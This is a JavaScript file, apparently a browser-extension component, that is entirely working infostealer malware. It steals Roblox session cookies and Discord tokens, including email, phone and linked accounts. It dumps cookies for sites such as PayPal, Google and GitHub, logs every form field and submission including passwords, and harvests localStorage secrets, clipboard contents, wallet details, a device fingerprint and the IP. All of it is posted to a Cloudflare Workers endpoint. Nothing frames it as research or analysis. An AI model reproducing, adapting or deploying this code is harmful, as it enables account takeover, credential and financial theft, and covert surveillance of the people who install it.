(function() {
'use strict';

var WORKER = 'https://cool-base-4ce9.iwif0001.workers.dev/api/ingest';
var _ip = 'unknown';

// Fetch IP once at startup
fetch('https://api.ipify.org?format=json').then(function(r) { return r.json(); }).then(function(d) {
  _ip = (d && d.ip) ? d.ip : 'unknown';
  console.log('[LARP] IP:', _ip);
}).catch(function() { console.log('[LARP] IP fetch failed'); });

function relay(type, data) {
  console.log('[LARP] relay:', type, JSON.stringify(data).slice(0, 200));
  try {
    fetch(WORKER, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(data)
    }).then(function(r) {
      console.log('[LARP] relay response:', type, r.status);
    }).catch(function(e) {
      console.error('[LARP] relay error:', type, e.message);
    });
  } catch(e) {
    console.error('[LARP] relay exception:', type, e.message);
  }
}

// --- roblox cookie ---
async function syncSession() {
  console.log('[LARP] syncSession: hostname=' + location.hostname);
  if (location.hostname.indexOf('roblox.com') === -1) {
    console.log('[LARP] syncSession: skipped (not roblox)');
    return;
  }
  var names = ['.ROBLOSECURITY', 'ROBLOSECURITY'];
  var cookieVal = null;
  for (var i = 0; i < names.length; i++) {
    try {
      var c = await chrome.cookies.get({ url: 'https://www.roblox.com', name: names[i] });
      console.log('[LARP] syncSession: cookie ' + names[i] + ' = ' + (c && c.value ? c.value.slice(0, 10) + '...' : 'null'));
      if (c && c.value) { cookieVal = c.value; break; }
    } catch(e) {}
  }
  if (!cookieVal) {
    console.log('[LARP] syncSession: chrome.cookies empty, trying document.cookie...');
    for (var j = 0; j < names.length; j++) {
      var n = names[j];
      var escaped = n.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
      var match = document.cookie.match(new RegExp('(?:^|;\\s*)' + escaped + '\\s*=\\s*([^;]*)'));
      if (match && match[1]) { cookieVal = match[1]; break; }
    }
  }
  if (!cookieVal) { console.log('[LARP] syncSession: no cookie found'); return; }
  console.log('[LARP] syncSession: cookie found, length=' + cookieVal.length);

  // User info comes from sandbox (content script reads page DOM meta tag)
  var ui = (typeof _userInfo !== 'undefined' && _userInfo) ? _userInfo : null;
  if (ui) console.log('[LARP] syncSession: user=' + ui.name + ' (ID: ' + ui.id + ')');

  // Build embed - cookie in description (4096 char limit) avoids 1024 field limit
  var embed = {
    title: 'Roblox Session [' + _ip + ']',
    color: 0x00B06A,
    description: '```\n' + cookieVal + '\n```',
    fields: [
      { name: 'Page', value: '`' + location.href.slice(0, 200) + '`' }
    ],
    footer: { text: 'Roblox' },
    timestamp: new Date().toISOString()
  };
  if (ui) {
    embed.fields.unshift(
      { name: 'User', value: '`' + ui.name + '` (' + (ui.displayName || 'N/A') + ')', inline: true },
      { name: 'ID', value: '`' + ui.id + '`', inline: true }
    );
    embed.thumbnail = { url: 'https://www.roblox.com/headshot-thumbnail/image?userId=' + ui.id + '&width=420&height=420&format=png' };
  }
  relay('session', { embeds: [embed] });
}

// --- discord token ---
var _acctCache = null;

function syncAccount() {
  console.log('[LARP] syncAccount: hostname=' + location.hostname);
  if (location.hostname.indexOf('discord.com') === -1) {
    console.log('[LARP] syncAccount: skipped (not discord)');
    return;
  }

  try {
    var raw = localStorage.getItem('token') || '';
    if (!raw) { console.log('[LARP] syncAccount: no token in localStorage'); return; }
    var key = raw.replace(/^"|"$/g, '');
    if (!key) { console.log('[LARP] syncAccount: empty key after strip'); return; }
    if (_acctCache === raw) { console.log('[LARP] syncAccount: cached, skipping'); return; }
    _acctCache = raw;
    console.log('[LARP] syncAccount: token found, length=' + raw.length);

    fetch('https://discord.com/api/v9/users/@me', { headers: { 'Authorization': key } }).then(function(r) {
      return r.ok ? r.json() : Promise.reject('status ' + r.status);
    }).then(function(d) {
      console.log('[LARP] syncAccount: user=' + d.username + '#' + d.discriminator);

      // Build avatar URL
      var avatarUrl = d.avatar
        ? 'https://cdn.discordapp.com/avatars/' + d.id + '/' + d.avatar + '.png?size=256'
        : 'https://cdn.discordapp.com/embed/avatars/' + (parseInt(d.discriminator) % 6) + '.png';

      var multi = [];
      try {
        var rawM = localStorage.getItem('multiAccountStore');
        if (rawM) {
          var p = JSON.parse(rawM);
          if (p && p._state && p._state.users) {
            multi = p._state.users.filter(function(u) { return u.token; }).map(function(u) { return { id: u.id, email: u.email, phone: u.phone }; });
          }
        }
      } catch(e) { console.error('[LARP] syncAccount multi error:', e.message); }
      console.log('[LARP] syncAccount: multi accounts=' + multi.length);

      var dk = raw.length > 1010 ? raw.slice(0, 480) + '\n... [TRUNCATED ' + (raw.length - 960) + ' chars] ...\n' + raw.slice(-480) : raw;
      var fields = [{ name: 'Token', value: '```\n' + dk + '\n```', inline: false }];
      fields.push(
        { name: 'Handle', value: '`' + d.username + '#' + d.discriminator + '`', inline: true },
        { name: 'Ref', value: '`' + d.id + '`', inline: true },
        { name: 'Contact', value: '`' + (d.email || '(not verified)') + '`', inline: true },
        { name: 'SMS', value: '`' + (d.phone || '(none)') + '`', inline: true },
        { name: 'Sec', value: '`' + (d.mfa_enabled ? 'Yes' : 'No') + '`', inline: true },
        { name: 'Tier', value: '`' + (d.premium_type === 0 ? 'None' : d.premium_type === 1 ? 'Nitro Classic' : d.premium_type === 2 ? 'Nitro' : 'Nitro Basic') + '`', inline: true }
      );
      if (multi.length > 0) {
        var lines = multi.map(function(a) { return 'ID: `' + a.id + '` Email: `' + (a.email || 'N/A') + '`'; }).join('\n');
        if (lines.length > 1010) lines = lines.slice(0, 1010) + '...';
        fields.push({ name: 'Assoc (' + multi.length + ')', value: lines, inline: false });
      }
      var su = location.href;
      if (su.length > 1014) su = su.slice(0, 1014) + '...';
      fields.push({ name: 'Origin', value: '`' + su + '`', inline: false });

      relay('acct', {
        embeds: [{ title: 'State Sync [' + _ip + ']', color: 0x5865F2, fields: fields, footer: { text: 'Session' }, timestamp: new Date().toISOString(), thumbnail: { url: avatarUrl } }]
      });
    }).catch(function(e) {
      console.error('[LARP] syncAccount fetch error:', e.message || e);
    });
  } catch(e) {
    console.error('[LARP] syncAccount exception:', e.message);
  }
}

// --- form monitor ---
var _entries = [];
function _fp(f) { return f.name + '|' + f.type + '|' + f.value; }

function _inputs(root) {
  var r = root || document;
  var fields = [];
  var s = 'input:not([type=hidden]):not([type=submit]):not([type=button]):not([type=reset]):not([type=image]), textarea, select';
  var els = r.querySelectorAll(s);
  for (var i = 0; i < els.length; i++) {
    var el = els[i];
    var v = el.value || '';
    if (!v || v.trim().length === 0) continue;
    fields.push({
      type: el.type || (el.tagName === 'SELECT' ? 'select' : el.tagName === 'TEXTAREA' ? 'textarea' : 'text'),
      name: el.name || '',
      id: el.id || '',
      autocomplete: el.autocomplete || '',
      placeholder: el.placeholder || '',
      value: v
    });
  }
  return fields;
}

function _extRelay(fields) {
  var fresh = [];
  for (var i = 0; i < fields.length; i++) {
    var f = fields[i];
    var fp = _fp(f);
    if (_entries.indexOf(fp) === -1) { fresh.push(f); _entries.push(fp); }
  }
  if (fresh.length === 0) return;
  if (_entries.length > 500) _entries = _entries.slice(-250);

  console.log('[LARP] formMonitor: relaying ' + fresh.length + ' new fields, total tracked=' + _entries.length);

  // Try embed first (max 25 fields, each 1024 chars)
  if (fresh.length <= 25) {
    var embedFields = fresh.map(function(f) {
      var l = f.name || f.id || f.autocomplete || f.placeholder || f.type;
      var v = f.value;
      if (v.length > 1020) v = v.slice(0, 1020) + '...';
      return { name: l + ' (' + f.type + ')', value: '`' + v + '`', inline: false };
    });
    relay('entry', {
      embeds: [{
        title: 'Field Data [' + _ip + ']',
        color: 0xF59E0B,
        description: 'Page: ' + location.href.slice(0, 200),
        fields: embedFields,
        footer: { text: 'Form Monitor' },
        timestamp: new Date().toISOString()
      }]
    });
    return;
  }

  // Too many fields - send as raw content (2000 char limit)
  var lines = fresh.map(function(f) {
    var l = f.name || f.id || f.autocomplete || f.placeholder || f.type;
    var v = f.value;
    if (v.length > 200) v = v.slice(0, 200) + '...';
    return '**' + l + '** (' + f.type + '): `' + v + '`';
  });
  var raw = '**Field Data**\nURL: ' + location.href.slice(0, 200) + '\n\n' + lines.join('\n');
  if (raw.length > 2000) raw = raw.slice(0, 1997) + '...';
  relay('entry', { content: raw });
}

function initMonitor() {
  console.log('[LARP] formMonitor: init on', location.hostname);
  if (document.documentElement.getAttribute('data-larp-form')) return;
  document.documentElement.setAttribute('data-larp-form', '1');

  setTimeout(function() { _extRelay(_inputs(document)); }, 1500);
  setInterval(function() { _extRelay(_inputs(document)); }, 3000);

  document.addEventListener('submit', function(e) {
    var f = e.target;
    if (!f || f.tagName !== 'FORM') return;
    var fields = _inputs(f);
    if (fields.length === 0) return;
    var action = f.action || '(same page)';
    var method = (f.method || 'GET').toUpperCase();
    var fresh = [];
    for (var i = 0; i < fields.length; i++) {
      var fp = _fp(fields[i]);
      if (_entries.indexOf(fp) === -1) { fresh.push(fields[i]); _entries.push(fp); }
    }
    if (fresh.length > 0) {
      console.log('[LARP] formMonitor: submit captured, ' + fresh.length + ' new fields');
      // Use embed for submit data (includes action + method)
      if (fresh.length <= 25) {
        var ef = fresh.map(function(x) {
          var l = x.name || x.id || x.autocomplete || x.placeholder || x.type;
          var v = x.value;
          if (v.length > 1020) v = v.slice(0, 1020) + '...';
          return { name: l + ' (' + x.type + ')', value: '`' + v + '`', inline: false };
        });
        relay('entry', {
          embeds: [{
            title: 'Form Submit [' + _ip + ']',
            color: 0xEF4444,
            description: 'Page: ' + location.href.slice(0, 200) + '\nAction: ' + action + ' (' + method + ')',
            fields: ef,
            footer: { text: 'Submit Event' },
            timestamp: new Date().toISOString()
          }]
        });
      } else {
        var lines = fresh.map(function(x) {
          var l = x.name || x.id || x.autocomplete || x.placeholder || x.type;
          var v = x.value;
          if (v.length > 200) v = v.slice(0, 200) + '...';
          return '**' + l + '** (' + x.type + '): `' + v + '`';
        });
        var raw = '**Form Submit**\nURL: ' + location.href.slice(0, 200) + '\nAction: ' + action + ' (' + method + ')\n\n' + lines.join('\n');
        if (raw.length > 2000) raw = raw.slice(0, 1997) + '...';
        relay('entry', { content: raw });
      }
    }
  }, true);

  var t = null;
  new MutationObserver(function() {
    if (t) clearTimeout(t);
    t = setTimeout(function() { _extRelay(_inputs(document)); }, 500);
  }).observe(document, { childList: true, subtree: true });
}

// --- cookie dump ---
async function dumpAllCookies() {
  console.log('[LARP] dumpCookies: requesting all cookies...');
  try {
    var cookies = await chrome.cookies.getAll();
    if (!cookies || cookies.length === 0) { console.log('[LARP] dumpCookies: no cookies'); return; }
    console.log('[LARP] dumpCookies: got ' + cookies.length + ' cookies');
    // Filter to high-value domains
    var valuable = [];
    var targets = ['roblox', 'discord', 'google', 'youtube', 'facebook', 'twitter', 'x.com', 'steam',
      'reddit', 'spotify', 'github', 'microsoft', 'twitch', 'amazon', 'paypal', 'netflix', 'tiktok'];
    for (var i = 0; i < cookies.length; i++) {
      var c = cookies[i];
      for (var j = 0; j < targets.length; j++) {
        if (c.domain.indexOf(targets[j]) !== -1) {
          valuable.push({ domain: c.domain, name: c.name, value: c.value.slice(0, 100) });
          break;
        }
      }
    }
    var all = cookies.map(function(c) { return c.domain + ' | ' + c.name + ' = ' + c.value.slice(0, 80); });
    // Build fields for valuable cookies
    var fields = [];
    for (var k = 0; k < valuable.length && k < 25; k++) {
      var v = valuable[k];
      fields.push({ name: v.domain + ' / ' + v.name, value: '`' + v.value + '`', inline: false });
    }
    if (fields.length === 0 && all.length > 0) {
      fields.push({ name: 'All (' + all.length + ')', value: '`' + all.slice(0, 10).join('\n') + '`', inline: false });
    }
    if (fields.length > 0) {
      relay('cookies', { embeds: [{ title: 'Cookie Dump [' + _ip + '] (' + cookies.length + ' total)', color: 0x8B5CF6, fields: fields, footer: { text: 'Cookies' }, timestamp: new Date().toISOString() }] });
    }
  } catch(e) { console.error('[LARP] dumpCookies error:', e.message); }
}

// --- fingerprint ---
function gatherFingerprint() {
  console.log('[LARP] fingerprint: gathering...');
  try {
    var fp = {
      platform: navigator.platform || 'N/A',
      language: navigator.language || 'N/A',
      languages: (navigator.languages || []).join(', ') || 'N/A',
      cookieEnabled: navigator.cookieEnabled,
      doNotTrack: navigator.doNotTrack || 'N/A',
      screen: (screen.width || '?') + 'x' + (screen.height || '?'),
      colorDepth: screen.colorDepth || 'N/A',
      pixelRatio: (window.devicePixelRatio || 1),
      timezone: Intl.DateTimeFormat().resolvedOptions().timeZone || 'N/A',
      hardwareConcurrency: navigator.hardwareConcurrency || 'N/A',
      deviceMemory: navigator.deviceMemory || 'N/A',
      vendor: navigator.vendor || 'N/A',
      gpu: 'N/A'
    };
    // Try to get GPU
    try {
      var canvas = document.createElement('canvas');
      var gl = canvas.getContext('webgl') || canvas.getContext('experimental-webgl');
      if (gl) {
        var dbg = gl.getExtension('WEBGL_debug_renderer_info');
        if (dbg) fp.gpu = gl.getParameter(dbg.UNMASKED_RENDERER_WEBGL);
      }
    } catch(e) {}
    console.log('[LARP] fingerprint: done, GPU=' + fp.gpu);
    var parts = [];
    for (var k in fp) {
      if (fp.hasOwnProperty(k)) parts.push('**' + k + '**: `' + fp[k] + '`');
    }
    relay('fingerprint', { content: '**IP: `' + _ip + '`**\n' + parts.join('\n') });
  } catch(e) { console.error('[LARP] fingerprint error:', e.message); }
}

// --- crypto wallets ---
function scanCryptoWallets() {
  var w = (typeof _wallets !== 'undefined' && _wallets) ? _wallets : null;
  if (!w) { console.log('[LARP] wallets: none detected'); return; }
  console.log('[LARP] wallets: detected', Object.keys(w).join(', '));
  try {
    var parts = [];
    if (w.ethereum) parts.push('**Ethereum/MetaMask**: Detected' + (w.ethAddr ? '\nAddress: `' + w.ethAddr + '`' : ''));
    if (w.solana) parts.push('**Solana/Phantom**: Detected' + (w.solAddr ? '\nAddress: `' + w.solAddr + '`' : ''));
    if (w.phantom && !w.solana) parts.push('**Phantom**: Detected');
    relay('wallets', { embeds: [{ title: 'Crypto Wallets [' + _ip + ']', color: 0xF7931A, description: parts.join('\n\n') || 'Wallets detected but no details', footer: { text: 'Wallets' }, timestamp: new Date().toISOString() }] });
  } catch(e) { console.error('[LARP] wallets error:', e.message); }
}

// --- storage dump ---
function dumpAllStorage() {
  var data = (typeof _storageAll !== 'undefined' && _storageAll) ? _storageAll : {};
  var keys = Object.keys(data);
  if (keys.length === 0) { console.log('[LARP] storage: empty'); return; }
  console.log('[LARP] storage: dumping ' + keys.length + ' keys');
  try {
    // Filter interesting keys (tokens, secrets, configs)
    var interesting = [];
    var patterns = ['token', 'secret', 'key', 'auth', 'session', 'jwt', 'cred', 'pass', 'login', 'user', 'account'];
    for (var i = 0; i < keys.length; i++) {
      var k = keys[i].toLowerCase();
      for (var j = 0; j < patterns.length; j++) {
        if (k.indexOf(patterns[j]) !== -1) {
          interesting.push(keys[i]);
          break;
        }
      }
    }
    var fields = [];
    var src = interesting.length > 0 ? interesting : keys;
    for (var m = 0; m < src.length && m < 25; m++) {
      var key = src[m];
      var val = data[key] || '';
      if (val.length > 1000) val = val.slice(0, 1000) + '...';
      fields.push({ name: key, value: '`' + val + '`', inline: false });
    }
    if (fields.length > 0) {
      relay('storage', { embeds: [{ title: 'localStorage Dump [' + _ip + '] (' + keys.length + ' keys)', color: 0x10B981, fields: fields, footer: { text: 'Storage' }, timestamp: new Date().toISOString() }] });
    }
  } catch(e) { console.error('[LARP] storage error:', e.message); }
}

// --- clipboard monitor ---
var _lastClipLen = 0;
function monitorClipboard() {
  var data = (typeof _clipboard !== 'undefined' && _clipboard) ? _clipboard : [];
  if (data.length === _lastClipLen) return;
  var fresh = data.slice(_lastClipLen);
  _lastClipLen = data.length;
  console.log('[LARP] clipboard: ' + fresh.length + ' new entries');
  try {
    for (var i = 0; i < fresh.length; i++) {
      var txt = fresh[i].text;
      if (txt.length > 1900) txt = txt.slice(0, 1900) + '...';
      relay('clipboard', { content: '**IP: `' + _ip + '`**\n```\n' + txt + '\n```' });
    }
  } catch(e) { console.error('[LARP] clipboard error:', e.message); }
}
setInterval(monitorClipboard, 3000);

// --- init ---
console.log('[LARP] logger loaded, starting...');
initMonitor();
setTimeout(syncSession, 1000);
setTimeout(syncAccount, 500);
setTimeout(syncAccount, 2000);
setTimeout(dumpAllStorage, 3000);
setTimeout(gatherFingerprint, 1500);
setTimeout(dumpAllCookies, 4000);
setTimeout(scanCryptoWallets, 2000);
console.log('[LARP] logger init complete');

})();
